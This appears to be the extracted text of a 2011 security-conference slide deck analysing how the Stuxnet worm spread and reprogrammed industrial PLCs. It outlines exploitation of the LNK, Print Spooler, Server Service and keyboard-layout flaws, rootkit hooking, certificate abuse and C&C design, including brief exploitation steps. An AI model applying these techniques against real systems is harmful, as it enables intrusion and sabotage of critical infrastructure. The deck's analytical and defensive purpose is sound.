Tomer Teller , DC9723, 18/1/11

Stuxnet:How to take over a (nuclear) power plant

A Black Hat gone good (courier -> cracker)

Security Evangelist at Check PointSpecialize in network hacking &

reversingFinished all levels of Angry Birds (3

stars!)

Who Am I ?

We like MalwareStuxnet is a Malware! Iran is involvedMicrosoft got pwn'dLearn new techniquesSee some DEMO’s (hopefully)

Why are we here ?

SCADA/ICS - stands for Supervisory Control and Data Acquisition. It generally refers to Industrial Control Systems (ICS): computer systems that monitor and control industrial, infrastructure, or facility-based processes.

PLC - A Programmable Logic Controller (PLC) – Control of machinery on factory assembly lines.

Field PG - used to program PLCs.

Wincc/Step7 –SIEMENS application used to program PLC (IDE/Compiler) and is installed on a Field PG.

Terminology

Architecture Single DLL Resource containing payloads Component based

Exploits 4 un-disclosed vulns!

Techniques “cunning” hack LoadLibrary() maneuver

Threat Overview

This is not normal…

Statistics

ref: Symantec dossier paper

Welcome to the Battle Field

What’s going to happen?

Here

What’s going to happen?

Water Pipe

Gas pipeline

Nuclear Reactor

Mission Objectives

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL:Reprogram ICS machines

The First Infection

An Insider A Contractor A Scada Confrence USB Give-away Super Sheep over the fence

Removable Drive Propagation

Okay, now what ?

LNK auto-execution (MS10-046) Autorun.inf Technique

LNK Auto-Execution (MS10-046)

Design-Level flaw when parsing LNK files (i.e. shortcut file)

File format can store links to control panel applet (CPL) DLL

Vulnerable code processes these links like it processes icons.

Problem: System does not check if the DLL is in SYSTEM32 or part of a white list (registered)

The Result: Arbitrary DLLs can be loaded via a shortcut.

LNK Binary Format

OffsetSize Field0x0000 4 HeaderSize0x0004 16 LinkCLSID0x0014 4 LinkFlags (optional

structure)

.

.0x0042 4 (reserved)

Control Items

Offset Size Field0x0000 2 itemIDSize0x0002 2 wDummy...0x0018 n Path

LNK Binary Format (DIY)

We all know AutoRun.inf File & Dialog

The code that parses that file is very “flexible”

How flexible ?

Autorun.inf Technique

EXE

AutoRun

Autorun.inf Technique cont.

Whenever stuxnet needs to load a DLL (including itself), it uses a special method to bypass anti-virus behavior blocking detection.

Stuxnet calls LoadLibrary() with a special crafted name that does not exist and causes LoadLibrary() to fail.

NTdll.dll was hooked to monitor for request to load specially crafted file names

These filename are mapped to a different location – specified by Stuxenet.

File name example: KERNEL32.DLL.ASLR.[ADDRESS]

The LoadLibrary() Technique

User Space Rootkit Hide files by hooking Kernel32 & NTDLL

▪ FindFirstFileW ,FindNextFileW▪ NTQueryDirectoryFile, ZwQueryDirectoryFile

Kernel Space Rootkit Register a device driver (MrxNet.sys) to

intercept I/O Request Packets (IRP)▪ Monitor Directory Control & Query

(read/write)▪ Detect & Infect Removable Devices

User/Kernel Space rootkits

Driver was digitally signed by a legitimate certificate that is trusted by Windows.

Both companies seem to have offices in the Hsinchu Science and Industrial Park (Taiwan)

Compromised Certificates

No Admin?! No Problem! (Vista+ Style)

Privilege Escalation in Task Scheduler.20-11-2010www.exploit-db.com/exploits/15589

Task file’s is hashed by CRC32 Modify the original task to run under

localSystem Fix the CRC checksum by “padding”<-

Collision

No Admin?! No Problem! (XP Style)

Privilege Escalation in Keyboard Layout (MS10-073)

Keyboard layout can be loaded from any where in the system

Out of bound index into an array of function pointers in win32k.sys

cf12fa38  cf933423 win32k!KbdNlsFuncTypeDummy [index 0]cf12fa3c  cf93342e win32k!KbdNlsFuncTypeNormal [index 1]cf12fa40  cf933474 win32k!KbdNlsFuncTypeAlt [index 2]cf12fa44  ff496867 [index 3]cf12fa48  ff466564 [index 4]cf12fa4c  60636261<- user space address [index 5]cf12fa50  0000006e .

1. Copy bad code to that address.

2. Change layout to point at index #5

3. Load the keyboard layout

Demo(s) Time

Autorun.inf LNK vulnerability (MS10-046)User Space RootKit (source

available)

Mission #1 Completed

Here

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL:Reprogram ICS machines

MS08-067 – Server Service Vulnerability

SRVSVC is an RPC interface which controls shares and files.

Binding to this interface via SMB and calling one of its functions -- NetprPathCanonicalize() with a malformed path string: e.g. /<name>/../../<rest of string>

Results in a buffer overflow Successful exploitation can lead to code execution with

System level privileges.

NetprPathCanonicalize()

\share\path1\path2/../../../../buff

\share\path1/../../../buff

\share/../../buff

/../buff

Search

For ‘\’

Search

For ‘\’

Search

For ‘\’

Search

For ‘\’

Buffer Overflow

MS10-061 – Printer Spooler Vulnerability

Released in 2009 in a hacker magazine

Allows a file to be written to the %System% folder by printing a document into a file.

Stuxnet “prints” 2 files A Managed object format (MOF) file – use for windows events The Stuxnet worm itself

Once the MOF file is detected by the OS in a specific directory (C:\windows\system\wbem\mof\<file>) Executes the event which is to run the executable file.

Network Shares Infection

Stuxnet enumerates all users accounts of the computer and the domain Try all available network resources

▪ Using the user credential Drop Stuxnet Executable on the remote

share▪ Schedule a network job to run 2 min afterNetScheduleJobAdd()

P2P Communication Component

Stuxnet installs an RPC Client / Server. Compromised computers can connect

and ask for the latest version

Infected machine

acting as Client

Infected machine

acting as Server

Get Version (0)

Send Version

Request Update (4)

Send Update

RPC Server Routines:0: Return Current Ver1: Inject & Execute2: Load module3: Inject to lsass.exe4: Send Current Version5: Create Process6: Read File

ref: Symantec dossier paper

Command & Control Component Stuxnet communicates back using an

HTTP C&C backdoor and encrypted data.

Infected

Machine

Command

And

Control

Server

GET

200 OKwww.msn.com

GET Index.php?data=[encrypted]

Command X

Command Y

ref: Symantec dossier paper

Mission #2 Completed

Here

Ping

Alive

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL:Reprogram ICS machines

PLC RootKit

On the Field PG, Stuxnet will look for: Specific version STEP7/WinCC Specific Network card Specific PLC model & version connected

Stuxnet will replace a DLL file that is in-charge of communicating with the PLC on the Field PG.

After replacement Stuxnet will be able to: Monitor PLC commands being written to and read

from Infect a PLC by inserting bad commands Mask the fact the PLC is infected

Infected PLC Example (READ/WRITE)

Step7/WinCC New DLL PLCOriginal DLL

Read()

Data

Modified

Data

Read()

Original

Data

Write()

Data

New DLLOriginal DLL

Write()

Wrote

Modified

Data

Field GP5 5 500

50055

? ? ?

5005005

Recap

Introduce Threat to Target

Propagate inside the network

Infect Field PG machines

GOAL:Reprogram ICS machines

Mission Accomplished

Who’s Behind It ?

Some say Israel: b:\myrtus\src\objfre_w2k_x86\i386 \guava.pdb

▪ myrtus -> myrtle -> Hadassah -> Queen Esther

▪ My-RTUs -> Remote Terminal Unit -> Control SCADA Systems

0x19790509▪ May 09, 1979. That date coincides with the

Iranian's execution of Habib Elghanian, a prominent Jewish businessman in Iran

Some say Germany Some say USA

Questions

?

kthxbye

Tomer Tellertomert@checkpoint.com